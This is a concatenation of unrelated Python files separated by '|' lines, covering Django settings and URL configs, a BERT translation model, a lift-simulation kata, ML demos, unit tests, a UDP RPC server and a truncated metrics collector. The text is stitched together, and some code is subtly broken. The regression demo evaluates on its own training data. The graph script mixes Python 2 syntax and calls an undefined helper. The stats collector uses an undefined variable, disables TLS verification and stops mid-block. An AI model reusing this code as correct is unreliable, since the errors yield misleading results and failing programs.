CORS_ORIGIN_WHITELIST = (
'127.0.0.1:4000',
'',
'',
'',
'',
)
STATIC_URL = '/static_dev/'
SECRET_KEY = get_secret("BC_SECRET_KEY", secrets)
# TODO: Change this for staging and production
MEDIA_URL = '/submissions/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'submissions')
#
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_HOST = 'smtp.cs.ucl.ac.uk'
# # EMAIL_HOST_USER = 'psipred@cs.ucl.ac.uk'
# DEFAULT_FROM_EMAIL = 'psipred@cs.ucl.ac.uk'
|
import torch
from transformers import BertConfig, BertModel, BertForMaskedLM, BertTokenizer
from transformers import DistilBertConfig
from transformers import DistilBertTokenizer, DistilBertModel, DistilBertForMaskedLM
from transformers import GPT2Model, GPT2Config
from easydict import EasyDict as ED
def build_model_pretrained(config):
#Create different tokenizers for both source and target language.
src_tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-multilingual-cased')
tgt_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
tgt_tokenizer.bos_token = '<s>'
tgt_tokenizer.eos_token = '</s>'
#encoder_config = DistilBertConfig.from_pretrained('distilbert-base-multilingual-cased')
encoder = DistilBertModel.from_pretrained('distilbert-base-multilingual-cased')
if config.decoder.pretrained:
decoder = BertForMaskedLM.from_pretrained('bert-base-uncased')
else:
decoder_config = BertConfig(vocab_size=tgt_tokenizer.vocab_size,
is_decoder=True)
decoder = BertForMaskedLM(decoder_config)
model = TranslationModel(encoder, decoder)
model.cuda()
tokenizers = ED({'src': src_tokenizer, 'tgt': tgt_tokenizer})
return model, tokenizers
|
'''
A multi-floor building has a Lift in it.
People are queued on different floors waiting for the Lift.
Some people want to go up. Some people want to go down.
The floor they want to go to is represented by a number (i.e. when they enter the Lift this is the button they will press)
Lift Rules
1.The Lift only goes up or down!
2.The Lift never changes direction until there are no more people wanting to get on/off in the direction it is already travelling
3.When empty the Lift tries to be smart. For example,
4. -If it was going up then it may continue up to collect the highest floor person wanting to go down
-If it was going down then it may continue down to collect the lowest floor person wanting to go up
5. The Lift has a maximum capacity of people which is variable (input in the test cases)
6. If the lift is empty, and no people are waiting, then it will return to the ground floor (0)
7. Only people going the same direction as the Lift may enter it, and they do so according to their "queue" order
### Input now is set to a tuple (all the floors) of tuples (all the people waiting at each floor ###
### Output now is set to a list of all the floors the lift has stopped at ###
'''
class Dinglemouse(object):
def __init__(self, queues, capacity):
self.queues = [list(x) for x in queues]
print(self.queues, '\t', 'queues in the beginning.')
self.capacity = capacity
self.solution = [0]
def theLift(self):
while any(q != [] for q in self.queues):
self.down((self.up()))
if self.solution[-1] != 0 : self.solution.append(0)
print(self.solution, '\t', 'solution after all functions performed')
return self.solution
def up(self):
lift_state = []
for i, q in enumerate(self.queues):
lift_state = sorted(lift_state)
if i == len(self.queues): break
elif q == [] and any(x == i for x in lift_state):
self.solution.append(i)
lift_state = [x for x in lift_state if x != i]
elif q == [] : pass
elif all(x < i for x in q[:self.capacity-len(lift_state)]):
pass
elif len(lift_state) == self.capacity:
temp_list = [x for x in lift_state if x >= i]
if temp_list != []:
if i == temp_list[0]:
lift_state = [x for x in lift_state if x != i]
[lift_state.append(x) for x in q if len(lift_state) < self.capacity]
del self.queues[i][0]
self.solution.append(i)
else:
try:
while len(lift_state) < self.capacity and self.queues[i] != []:
lift_state = [x for x in lift_state if x != i]
lift_state.append(self.queues[i][0])
del self.queues[i][0]
except Exception as e:
print(e, i, q, lift_state, 'error in UP()')
pass
if i != self.solution[-1]: self.solution.append(i)
#print(self.queues, '\t', 'queues after function up()')
#print(lift_state, '\t', 'lift_state after function up()')
return lift_state
def down(self, lift_state):
for i, q in reversed(list(enumerate(self.queues))):
lift_state = sorted(lift_state, reverse=True)
if i == len(self.queues): break
elif q == [] and any(x == i for x in lift_state):
self.solution.append(i)
lift_state = [x for x in lift_state if x != i]
elif q == [] : pass
elif all(x > i for x in q[:self.capacity-len(lift_state)]):
pass
elif len(lift_state) == self.capacity:
temp_list = [x for x in lift_state if x <= i]
if temp_list != []:
if i == temp_list[0]:
lift_state = [x for x in lift_state if x != i]
[lift_state.append(x) for x in q if len(lift_state) < self.capacity]
del self.queues[i][0]
self.solution.append(i)
else:
try:
while len(lift_state) < self.capacity and self.queues[i] != []:
lift_state = [x for x in lift_state if x != i]
lift_state.append(self.queues[i][0])
del self.queues[i][0]
except Exception as e:
print(e, i, q, lift_state, 'error in DOWN()')
pass
if i != self.solution[-1]: self.solution.append(i)
#print(self.queues, '\t', 'queues after function down()')
#print(lift_state, '\t', 'lift_state after function down()')
# Floors: G 1 2 3 4 5 6 Answers: Lift capacity:
tests = [[ ( (), (), (5,5,5), (), (), (), () ), [0, 2, 5, 0], 5 ],
[ ( (), (), (1,1), (), (), (), () ), [0, 2, 1, 0], 5 ],
[ ( (), (3,), (4,), (), (5,), (), () ), [0, 1, 2, 3, 4, 5, 0], 5 ],
[ ( (), (0,), (), (), (2,), (3,), () ), [0, 5, 4, 3, 2, 1, 0], 5 ],
[ ( (2,3,4,5,6,1,1), (), (), (), (), (), () ), [0,2,3,0,4,5,0,1,6,0,1,0], 2 ],
[ ( (2,3,4,5,6,1,1), (), (), (), (), (), () ), [0,2,3,4,5,6,0,1,0], 5 ]]
for queues, answer, capacity in tests:
lift = Dinglemouse(queues, capacity)
lift.theLift()
print(answer, '\t', 'correct answer', '\n')
|
import routes.error_handlers
import routes.headphonecheck
import routes.audiofreq
import routes.audiopilot
import routes.psychquiz
|
from django.conf.urls import url
from . import views
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^$',views.home,name='home'),
url(r'^accounts/profile/$',views.post_list,name='post_list'),
url(r'^signin/$',auth_views.login, {'template_name': 'blog/login.html'}, name='login'),
url(r'^logout/$', auth_views.logout, {'next_page': 'login'}, name='logout'),
url(r'^signup/$', views.signup, name='signup'),
url(r'^post_new/$', views.post_new, name='post_new'),
url(r'^send_sqs_get_images/$', views.send_sqs, name='send_sqs'),
]
|
from matplotlib import pyplot as plt
import numpy as np
from sklearn import datasets,linear_model
from sklearn.metrics import mean_squared_error,r2_score
#load data sets
diabetes=datasets.load_diabetes()
diabetes_X=diabetes.data[:,np.newaxis,2]
#split data into training and testing
diabetes_X_train=diabetes_X[:-20]
diabetes_Y_train=diabetes.target[:-20]
diabetes_X_test=diabetes_X[:-20]
diabetes_Y_test=diabetes.target[:-20]
#create the regression model
regr=linear_model.LinearRegression()
#train model using training set
regr.fit(diabetes_X_train,diabetes_Y_train)
#make prediction on testing
diabetes_Y_pred=regr.predict(diabetes_X_test)
#display regressiob coefficient
print("Coefficients : \n ",regr.coef_)
print("Mean squared error:%.2f"%mean_squared_error(diabetes_Y_test,diabetes_Y_pred))
print("Variance Score : %2f"%r2_score(diabetes_Y_test,diabetes_Y_pred))
#plotting output
plt.scatter(diabetes_X_test,diabetes_Y_test,color='red')
plt.plot(diabetes_X_test,diabetes_Y_pred,color='blue',linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show() |
import django_rq
from django.contrib import admin
from neoprospecta.parameter.models import EntryParameter, PaginationParameter
# Register your models here.
from util.import_entry import Process, process_entry
def to_process_entry(self, request, queryset):
queue = django_rq.get_queue()
queue.enqueue(process_entry)
self.message_user(request, "A entry será processada em breve")
to_process_entry.short_description = "Processar entries"
class EntryParameterAdmin(admin.ModelAdmin):
list_display = ('name', 'row_start', 'row_end')
search_fields = ('name',)
actions = [to_process_entry]
admin.site.register(EntryParameter, EntryParameterAdmin)
class PaginationParameterAdmin(admin.ModelAdmin):
list_display = ('name', 'rows' )
search_fields = ('name',)
admin.site.register(PaginationParameter, PaginationParameterAdmin) |
from django.urls import path
from . import views
# from .routers import router
urlpatterns = [
# url('^$', views.index),
# url('slack/oauth/', views.SocialLoginView.as_view()),
# path('sforce/', views.ContactViewSet.as_view()),
# path("sforce/add/", views.SalesForceDetailStore.as_view()),
# path("sforce/edit/<int:pk>/", views.SalesForceDetailUpdate.as_view()),
# path('event/hook/', views.event_hook, name='event_hook')
# path('hubspot/webhook/', HubspotWebhookView.as_view(), name='hubspot_webhook'),
# path('django_pipedrive/', include('django_pipedrive.urls')),
]
|
import numpy
import keras
from labels import LABEL_SPATIAL, LABEL_OTHER
from keras import layers
from pyfasttext import FastText
from callbacks import ClassAccuracy, Accuracy
class FeatureGenerator:
def __init__(self, fastext_path):
self.fasttext = FastText(fastext_path)
def generate_record(self, tuple):
tr = self.fasttext.get_numpy_vector(tuple[0])
si = self.fasttext.get_numpy_vector(tuple[1])
lm = self.fasttext.get_numpy_vector(tuple[2])
#return numpy.concatenate((tr, lm))
#return numpy.concatenate((tr, si, lm))
return numpy.concatenate((tr, si, lm, lm - tr))
#return numpy.concatenate((si, lm - tr, tr - lm))
def generate(self, values):
return numpy.array([self.generate_record(value) for value in values])
class SpatialClassifier:
def __init__(self, feature_generator):
self.gen = feature_generator
self.model = self.create_model()
self.score = []
def create_model(self):
input_size = len(self.gen.generate_record(("a", "b", "c")))
inputs = keras.Input(shape=(input_size,))
x = inputs
x = layers.Dense(input_size, activation='relu')(x)
x = layers.Dropout(0.8)(x)
x = layers.Dense(900, activation='relu')(x)
x = layers.Dropout(0.8)(x)
x = layers.Dense(600, activation='relu')(x)
x = layers.Dropout(0.8)(x)
x = layers.Dense(300, activation='relu')(x)
x = layers.Dropout(0.8)(x)
#x = layers.Dense(100, activation=tf.nn.relu)(x)
#x = layers.Dropout(0.8)(x)
#outputs = layers.Dense(2, activation='sigmoid')(x)
outputs = layers.Dense(2, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs, name='spatial_tr_si_lm_classifier')
model.summary()
model.compile(loss='sparse_categorical_crossentropy',
optimizer=keras.optimizers.RMSprop(),
metrics=['accuracy'])
return model
def fit(self, train_x, train_y, test_x, test_y):
callback_train = ClassAccuracy(train_x, train_y, 1, "Class accuracy on train")
callback_train_acc = Accuracy(train_x, train_y, "Total accuracy on train")
callback_test_1 = ClassAccuracy(test_x, test_y, 1, "Class accuracy on test")
callback_test_0 = ClassAccuracy(test_x, test_y, 0, "Class accuracy on test")
callback_test_acc = Accuracy(test_x, test_y, "Total accuracy on test")
callbacks = [callback_train, callback_train_acc, callback_test_1, callback_test_0, callback_test_acc]
print(train_x.shape)
self.model.fit(train_x, train_y, epochs=40, validation_split=0.2, verbose=1, callbacks=callbacks)
self.score = callback_test_acc.avg_score(5) * 100
def save(self, path):
self.model.save(path)
def load(self, path):
self.model = keras.models.load_model(path)
def predict(self, trajector, spatial_indicator, landmark):
x = [trajector, spatial_indicator, landmark]
x = self.gen.generate([x])
y = self.model.predict_on_batch(x)[0]
return LABEL_SPATIAL if y[1] > y[0] else LABEL_OTHER
def get_score(self):
return self.score
@staticmethod
def load_model(feature_generator, model_path):
classifier = SpatialClassifier(feature_generator)
classifier.load(model_path)
return classifier
|
from igraph import *
import pandas as pd
import numpy as np
def get_graph():
graph = Graph.Read_Ncol("dataset/facebook_combined.txt", directed=False)
dataset = pd.read_csv("dataset/fb-features.txt", header = None, sep = ' ')
num_features = len(dataset.columns)
V = graph.vcount()
E = graph.ecount()
features = {}
for i in range(V):
features[i] = []
for i in range(V):
flag=1
for j in range(num_features):
#print i,j
if dataset[j][i] == 1:
if flag==1:
listt =[]
listt.append(j)
features[i] = listt
flag =0
else:
listt =[]
listt =features[i]
listt.append(j)
features[i] = listt
#ends_graph = ends(graph, E(graph))
ends_graph = graph.es
#print features
#print "hi"
for i in range(graph.ecount()):
#print features[ends_graph[i].target]
result1 = features[ends_graph[i].source]
#print result1
result2 = features[ends_graph[i].target]
result1 = [int(i) for i in result1]
result2 = [int(i) for i in result2]
a = len(set(result1).intersection(set(result2)))
graph.es[i]["weight"] =a
return graph
def get_outlierness_EWPL(g):
V = g.vcount()
E = g.ecount()
# Ego_graph is a list of ego graphs of each node
ego_graph = []
for i in range(V):
ego_graph.append(g.subgraph(g.neighborhood(i)))
print ego_graph[0].es[0]['weight']
# ego_edgesize is an integer vector of size V, and stores no.of edges in egonet of each node
ego_edgesize = []
for x in ego_graph:
ego_edgesize.append(x.ecount())
# ego_weight is an integer vector of size V, and stores the sum of the weight of egonet of each node
ego_weight = [0]*V
for i in range(0, V):
for j in range(0, len(ego_graph[i].es)):
ego_weight[i] += ego_graph[i].es[j]['weight'] + 1
C = 1
beta = 1.15
#oulierness is calculated according to the Edge Density Power Law of the Oddball Algorithm
outlierness = [0]*V
for i in range(0, V):
outlierness[i] = (max(ego_weight[i], C*(ego_edgesize[i]**beta)) / min(ego_weight[i], C*(ego_edgesize[i]**beta))) * (log10(abs(ego_weight[i] - C*(ego_edgesize[i]**beta)) + 1))
outlierness = normalize_vector(outlierness)
return outlierness
graph = get_graph()
#E(graph)$weight
#outlierness_EDPL <- get_outlierness_EDPL(graph)
outlierness_EWPL = get_outlierness_EWPL(graph)
print(outlierness_EWPL)
|
'''
author: juzicode
address: www.juzicode.com
公众号: 桔子code/juzicode
date: 2020.7.15
'''
print('\n')
print('-----欢迎来到www.juzicode.com')
print('-----公众号: juzicode/桔子code\n')
from ctypes import *
a = c_double(3.0)
b = c_double(2.0)
print('a=',a)
print('a.value=',a.value)
print('b=',b)
print('b.value=',b.value)
libc = CDLL('msvcrt.dll') #加载dll
ret = libc.pow(a,b) #用对象名.函数名的方法调用c函数
print('pow(a,b):',ret)
libc.pow.restype = c_double
libc.pow.argtypes = (c_double, c_double)
ret = libc.pow(a,b) #用对象名.函数名的方法调用c函数
print('pow(a,b):',ret) |
import os
import unittest
from unittest.mock import patch
from mavedbconvert import parsers, exceptions, constants
from mavedbconvert.tests import ProgramTestCase
# TODO: convert these tests to use temp directories
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
class TestParseBoolean(unittest.TestCase):
def test_true_if_str_of_true(self):
self.assertTrue(parsers.parse_boolean(True))
self.assertTrue(parsers.parse_boolean("True"))
def test_false_if_not_repr_of_true(self):
self.assertFalse(parsers.parse_boolean(None))
self.assertFalse(parsers.parse_boolean("none"))
self.assertFalse(parsers.parse_boolean(""))
self.assertFalse(parsers.parse_boolean(False))
class TestParseNumeric(unittest.TestCase):
def test_converts_to_dtype(self):
self.assertIsInstance(
parsers.parse_numeric("1", name="int", dtype=float), float
)
def test_value_error_cannot_cast_to_dtype(self):
with self.assertRaises(ValueError):
parsers.parse_numeric(None, name="value", dtype=int)
with self.assertRaises(ValueError):
parsers.parse_numeric("a", name="value", dtype=int)
class TestParseString(unittest.TestCase):
def test_returns_none_if_falsey(self):
self.assertIsNone(parsers.parse_string(None))
self.assertIsNone(parsers.parse_string(" "))
self.assertIsNone(parsers.parse_string(""))
def test_returns_string_stripped_of_ws(self):
self.assertEqual(parsers.parse_string(" aaa "), "aaa")
class TestParseSrc(unittest.TestCase):
@patch(
"mavedbconvert.parsers.parse_string",
return_value=os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv"),
)
def test_calls_parse_string(self, patch):
parsers.parse_src(os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv"))
patch.assert_called()
def test_ok_file_exists(self):
path = os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv")
self.assertEqual(path, parsers.parse_src(path))
def test_error_no_value(self):
for v in (None, "None", ""):
with self.assertRaises(ValueError):
parsers.parse_src(v)
def test_error_file_not_found(self):
path = os.path.join(TEST_DATA_DIR, "enrich2", "missing_file.tsv")
with self.assertRaises(FileNotFoundError):
parsers.parse_src(path)
def test_error_file_is_a_dir(self):
with self.assertRaises(IsADirectoryError):
parsers.parse_src(os.path.join(TEST_DATA_DIR))
class TestParseDst(ProgramTestCase):
@patch(
"mavedbconvert.parsers.parse_string", return_value=os.path.join(TEST_DATA_DIR)
)
def test_calls_parse_string(self, patch):
parsers.parse_dst(os.path.join(TEST_DATA_DIR))
patch.assert_called()
def test_ok_dst_exists(self):
path = os.path.join(os.path.join(TEST_DATA_DIR))
self.assertEqual(path, parsers.parse_dst(path))
def test_returns_none_no_value(self):
for v in (None, "None", ""):
self.assertIsNone(parsers.parse_dst(v))
def test_dst_path_is_normalised(self):
path = TEST_DATA_DIR + "//fasta"
self.assertEqual(parsers.parse_dst(path), os.path.join(TEST_DATA_DIR, "fasta"))
def test_makes_dst_directory_tree(self):
path = os.path.join(TEST_DATA_DIR, "subdir")
parsers.parse_dst(path)
self.assertTrue(os.path.isdir(path))
self.bin.append(path)
class TestParseProgram(unittest.TestCase):
def test_ok_supported_program(self):
for p in ("enrich2", "enrich", "empiric"):
parsers.parse_program(p)
def test_error_unsupported_program(self):
with self.assertRaises(ValueError):
parsers.parse_program("aaa")
def test_sets_correct_program_from_dict(self):
program = {"enrich": True, "empiric": False, "enrich2": False}
self.assertEqual(parsers.parse_program(program), "enrich")
program = {"enrich": False, "empiric": False, "enrich2": True}
self.assertEqual(parsers.parse_program(program), "enrich2")
program = {"enrich": False, "empiric": True, "enrich2": False}
self.assertEqual(parsers.parse_program(program), "empiric")
with self.assertRaises(ValueError):
program = {"enrich": False, "empiric": False, "enrich2": False}
parsers.parse_program(program)
class TestParseWildTypeSequence(unittest.TestCase):
def test_can_read_from_fasta(self):
path = os.path.join(TEST_DATA_DIR, "fasta", "lower.fa")
wtseq = parsers.parse_wt_sequence(path, program="enrich2", non_coding=True)
expected = (
"ACAGTTGGATATAGTAGTTTGTACGAGTTGCTTGTGGCTT"
"CGCCAGCGCATACCAGCATAGTAAAGGCAACGGCCTCTGA"
"GAGGCTACGATCGTGCCTTGTGGCAAGTCTTCGCTCGCAC"
"GCCCTTCCTACCGTGCTATGAGAGGAAATCTCGGGCGTA"
).upper()
self.assertEqual(wtseq, expected)
def test_error_invalid_chars(self):
with self.assertRaises(exceptions.InvalidWildTypeSequence):
parsers.parse_wt_sequence("ATXG", program="enrich2", non_coding=True)
def test_error_not_divisible_by_three_enrich_empiric(self):
with self.assertRaises(exceptions.SequenceFrameError):
parsers.parse_wt_sequence("ATGG", program="enrich")
with self.assertRaises(exceptions.SequenceFrameError):
parsers.parse_wt_sequence("ATGG", program="empiric")
def test_error_not_divisible_by_three_enrich2_coding(self):
with self.assertRaises(exceptions.SequenceFrameError):
parsers.parse_wt_sequence("ATGG", program="enrich2")
def test_ok_not_divisible_by_three_enrich2_noncoding(self):
parsers.parse_wt_sequence("ATGG", program="enrich2", non_coding=True)
def test_ok_divisible_by_three_enrich2_coding(self):
parsers.parse_wt_sequence("ATGATC", program="enrich2")
def test_ok_divisible_by_three_enrich_empiric(self):
parsers.parse_wt_sequence("ATGATC", program="enrich")
parsers.parse_wt_sequence("ATGATC", program="empiric")
class TestParseInputType(unittest.TestCase):
@patch("mavedbconvert.parsers.parse_string", return_value="counts")
def test_calls_parse_string(self, patch):
parsers.parse_input_type(constants.count_type)
patch.assert_called()
def test_error_unrecognised_input_type(self):
with self.assertRaises(ValueError):
parsers.parse_input_type("aaa")
def test_ok_recognised_input_type(self):
for v in (constants.score_type, constants.count_type):
parsers.parse_input_type(v)
class TestParseScoreColumn(unittest.TestCase):
@patch("mavedbconvert.parsers.parse_string", return_value="score")
def test_calls_parse_string(self, patch):
parsers.parse_score_column("score", constants.score_type, program="enrich")
patch.assert_called()
def test_error_enrich_scores_input_and_column_not_defined(self):
with self.assertRaises(ValueError):
parsers.parse_score_column(
value=None, input_type=constants.score_type, program="enrich"
)
def test_error_empiric_scores_input_and_column_not_defined(self):
with self.assertRaises(ValueError):
parsers.parse_score_column(
value=None, input_type=constants.score_type, program="empiric"
)
def test_ok_enrich_count_input_and_column_not_defined(self):
parsers.parse_score_column(
value=None, input_type=constants.count_type, program="enrich"
)
def test_ok_empiric_counts_input_and_column_not_defined(self):
parsers.parse_score_column(
value=None, input_type=constants.count_type, program="empiric"
)
def test_ok_enrich2_and_column_not_defined(self):
parsers.parse_score_column(
value=None, input_type=constants.score_type, program="enrich2"
)
class TestParseOffset(unittest.TestCase):
@patch("mavedbconvert.parsers.parse_numeric", return_value=0)
def test_calls_parse_numeric(self, patch):
parsers.parse_offset(0, program="enrich")
patch.assert_called()
def test_error_enrich2_is_coding_and_not_mult_of_three(self):
with self.assertRaises(ValueError):
parsers.parse_offset(1, "enrich2", non_coding=False)
def test_ok_enrich2_is_coding_and_mult_of_three(self):
self.assertEqual(-6, parsers.parse_offset("-6", "enrich2", non_coding=False))
def test_ok_enrich2_non_coding_and_not_mult_of_three(self):
self.assertEqual(-7, parsers.parse_offset("-7", "enrich2", non_coding=True))
def test_error_enrich_empiric_offset_not_mult_of_three(self):
with self.assertRaises(ValueError):
parsers.parse_offset(1, "enrich", non_coding=False)
with self.assertRaises(ValueError):
parsers.parse_offset(1, "empiric", non_coding=False)
def test_ok_enrich_empiric_offset_mult_of_three(self):
self.assertEqual(-6, parsers.parse_offset("-6", "enrich"))
self.assertEqual(-6, parsers.parse_offset("-6", "empiric"))
class TestParseDocopt(unittest.TestCase):
@staticmethod
def mock_args(
program=None,
src=None,
dst=None,
wtseq="AAA",
offset=0,
zero_based=False,
score_column="score",
hgvs_column=None,
input_type="scores",
skip_header="0",
skip_footer="0",
sheet_name=None,
non_coding=False,
):
if program is None:
program = "enrich2"
if src is None:
src = os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv")
return {
"enrich": True if program == "enrich" else False,
"enrich2": True if program == "enrich2" else False,
"empiric": True if program == "empiric" else False,
"<src>": os.path.join(TEST_DATA_DIR, program, src),
"--dst": os.path.join(TEST_DATA_DIR, program, dst) if dst else dst,
"--score-column": score_column,
"--hgvs-column": hgvs_column,
"--skip-header": skip_header,
"--skip-footer": skip_footer,
"--sheet-name": sheet_name,
"--wtseq": wtseq,
"--offset": offset,
"--input-type": input_type,
"--zero-based": zero_based,
"--non-coding": non_coding,
}
def test_returns_correct_program(self):
for p in ("enrich", "enrich2", "empiric"):
args = self.mock_args(program=p)
self.assertEqual(parsers.parse_docopt(args)[0], p)
def test_is_coding_is_flip_of_non_coding(self):
args = self.mock_args(non_coding=False)
_, kwargs = parsers.parse_docopt(args)
self.assertTrue(kwargs["is_coding"])
args = self.mock_args(non_coding=True)
_, kwargs = parsers.parse_docopt(args)
self.assertFalse(kwargs["is_coding"])
def test_one_based_is_flip_of_zero_based(self):
args = self.mock_args(zero_based=False)
_, kwargs = parsers.parse_docopt(args)
self.assertTrue(kwargs["one_based"])
args = self.mock_args(zero_based=True)
_, kwargs = parsers.parse_docopt(args)
self.assertFalse(kwargs["one_based"])
def test_contains_wt_sequence_key(self):
args = self.mock_args()
_, kwargs = parsers.parse_docopt(args)
self.assertIn("wt_sequence", kwargs)
def test_contains_skip_footer_rows_key(self):
args = self.mock_args()
_, kwargs = parsers.parse_docopt(args)
self.assertIn("skip_footer_rows", kwargs)
def test_contains_skip_header_rows_key(self):
args = self.mock_args()
_, kwargs = parsers.parse_docopt(args)
self.assertIn("skip_header_rows", kwargs)
if __name__ == "__main__":
unittest.main()
|
import unittest
def subset(x):
"""Return a list of all subsets of a given set."""
if x == set():
return [x]
y = list(x)
set_list, last = subset(set(y[:-1])), y[-1]
set_list_plus_last = [i | {last} for i in set_list]
return set_list + set_list_plus_last
def subset_comb(x):
"""Returns all subsets of given set x, combinatorics approach."""
_max = 2 ** len(x)
_set = list(x)
ret = []
for i in range(_max):
ret.append(subset_by_bits(i, _set))
return ret
def subset_by_bits(num, x):
"""Return a subset of x based on the 1 digits in the binary form of x."""
ret = set()
count = len(x) - 1
while num > 0:
if num & 1 == 1:
ret.add(x[count])
num = num >> 1
count -= 1
return ret
class SubsetTest(unittest.TestCase):
def to_frozen(self, set_list):
return {frozenset(i) for i in set_list}
for name in ['subset', 'subset_comb']:
func = globals()[name]
def test_single_element(self):
subsets = [set(), {1}]
self.assertEqual(self.to_frozen(subsets), self.to_frozen(func({1})))
setattr(SubsetTest, 'test_' + name + '_single_element', test_single_element)
def test_multiple_elements(self):
subsets = [set(), {1}, {2}, {1, 2}]
self.assertEqual(self.to_frozen(subsets), self.to_frozen(func({1, 2})))
setattr(SubsetTest, 'test_' + name + '_multiple_elements', test_multiple_elements)
def test_more_elements(self):
subsets = [set(), {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}]
self.assertEqual(self.to_frozen(subsets), self.to_frozen(func({1, 2, 3})))
setattr(SubsetTest, 'test_' + name + '_more_elements', test_more_elements)
if __name__ == '__main__':
unittest.main()
|
import socket
from mycode import abc, double_int, say_hello, rpc_test, doggo_test, favorite_number, half_float, bye_professor
import json
# UDP IP address and port
UDP_IP = "127.0.0.1"
UDP_PORT = 5005
# Class for the registry
class RPCRegistry(set):
# Create a blank set on init
def __init__(self):
self.registryMapping = {}
# Register the function to the set
def register(self, func):
self.registryMapping[func.__name__] = func
# Class for the Server
class RPCServer:
# Set up the registry
def __init__(self):
self.registry = RPCRegistry()
# Call the function
def __call__(self, *args, **kwargs):
loaded_data = json.loads(args[0])
function_name = self.registry.registryMapping[loaded_data["name"]]
func_args = tuple(loaded_data["args"])
return function_name(*func_args)
# Register the function wrapper
def register(self, wrapper):
self.registry.register(wrapper)
return wrapper
def serve(passed_server):
# Set up UDP Socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((UDP_IP, UDP_PORT))
# Run 5-ever
while True:
# Receive Data
data, address = sock.recvfrom(1024)
# Decode and Dump JSON
decoded_data = data.decode()
return_data = passed_server.__call__(decoded_data)
# Encode and Send Back Data
json_return_data = json.dumps(return_data)
sock.sendto(json_return_data.encode(), address)
if __name__ == '__main__':
# Set up server
server = RPCServer()
# Register wrapped functions
wrapped_abc = server.register(abc)
wrapped_double = server.register(double_int)
wrapped_sayhello = server.register(say_hello)
wrapped_rpc_test = server.register(rpc_test)
wrapped_doggo_test = server.register(doggo_test)
wrapped_favorite_number = server.register(favorite_number)
wrapped_half_float = server.register(half_float)
wrapped_bye_professor = server.register(bye_professor)
# Run server
serve(server)
|
#!/usr/bin/env python
import json
import logging
import os
import re
import time
import urllib
import urlparse
import requests
from influxdb import InfluxDBClient
logger = logging.getLogger("domain_stats")
class MetaverseAuth:
METAVERSE_URL = "https://metaverse.highfidelity.com/oauth"
TOKEN_URL = "%s/token" % METAVERSE_URL
AUTHORIZE_URL = "%s/authorize" % METAVERSE_URL
def __init__(self, username, password):
self._cookies = {}
self._tokens = self._get_access_token(username=username,
password=password)
# Call once when initialized
def _get_access_token(self, username=None, password=None):
if username and password:
resp = requests.post(
self.TOKEN_URL,
data={
"grant_type": "password",
"scope": "owner",
"username": username,
"password": password,
},
)
tokens = resp.json()
assert "access_token" in tokens
return tokens
def _get_cookies(self, domain, port):
k = (domain, port)
if k in self._cookies:
return self._cookies[k]
# This request is meant to redirect through the metaverse and
# back to the domain server. If we followed the redirect it
# would fail because it's missing the access token. A valid
# request needs the client_id, state, and access_token. We have
# to make an intial request to grab the state and client_id, but
# we don't follow the redirect because it will fail until we add
# the access token.
domain_tls_url = "https://%s:%d" % (domain, int(port) + 1)
domain_url = "http://%s:%d" % (domain, port)
redirect_resp = requests.get(domain_url, allow_redirects=False)
location = urlparse.urlparse(redirect_resp.headers["Location"])
query = urlparse.parse_qs(location.query)
params = {
"client_id": query["client_id"][0],
"response_type": "code",
"state": query["state"][0],
"redirect_uri": "%s/oauth" % domain_tls_url,
}
oauth_url = "%s?%s" % (self.AUTHORIZE_URL, urllib.urlencode(params))
# Make the initial authorization request and steal its cookies.
session = requests.Session()
headers = {"Authorization": "Bearer %s" % self._tokens["access_token"]}
session.get(oauth_url, headers=headers, verify=False)
cookies = session.cookies.get_dict()
self._cookies[k] = cookies
return cookies
def __call__(self, request):
url = urlparse.urlparse(request.url)
cookies = self._get_cookies(url.hostname, url.port)
cookies_str = "; ".join(("%s=%s" % (k, v) for k, v in cookies.items()))
request.headers.update({"Cookie": cookies_str})
return request
class DomainRequester:
def __init__(self, hostname, auth):
self.hostname = hostname
self.auth = auth
def get(self, path):
base_url = 'http://%s:40100' % self.hostname
path = re.sub(r'^/+', '', path)
url = '/'.join((base_url, path))
response = requests.get(url, auth=self.auth)
return response.json()
def __call__(self, path):
return self.get(path)
def clean_measurement(measurement):
measurement = measurement.replace(' ', '-')
if not measurement.startswith('z_'):
return {}, measurement
val = measurement.split('.')
if val[0] not in ('z_avatars', 'z_listeners'):
return {}, measurement
return {'uuid': val.pop(1)}, '.'.join(val)
def clean_val(val):
try:
return float(val)
except ValueError:
m = re.match(r'^(\d+) \w+$', val) # like: 0 usecs
if m:
val = m.groups()[0]
return float(m.groups()[0])
raise
def flatten(key, val):
if isinstance(val, dict):
for k, v in val.items():
k = '.'.join((key, k)) if key else k
for _ in flatten(key=k, val=v):
yield _
else:
if val is not None:
try:
# InfluxDB is strongly typed and tries to guess types.
# If you add a new measure measurement as 0 it will
# guess it's an int, but when you later add 0.1234 it
# will explode because it can't handle a float. So, just
# assume everything is a float. This means string won't
# work, but InfluxDB doesn't like strings anyway.
val = clean_val(val)
except (TypeError, ValueError) as exc:
logger.warn("couldn't clean value for %s: %s", key, val)
else:
yield (key, val)
def get_stats(request, domain_name):
nodes = {n['type']: n for n in request('nodes.json')['nodes']}
for k in ('audio-mixer', 'avatar-mixer'):
d = request('nodes/%s.json' % nodes[k]['uuid'])
for measurement, value in flatten('', d):
yield measurement, value, {'domain_name': domain_name,
'assignment': k}
def write_stats(request, client_kwargs):
client = InfluxDBClient(**client_kwargs)
client.create_database(client_kwargs['database'])
stats = get_stats(request, domain_name)
body = []
for measurement, value, tags in stats:
_tags, measurement = clean_measurement(measurement)
tags.update(_tags)
point = {
'measurement': measurement,
'tags': tags,
'fields': {
'value': value,
}
}
logger.debug(point)
body.append(point)
try:
client.write_points(body)
except Exception as exc:
logger.exception("couldn't write points")
else:
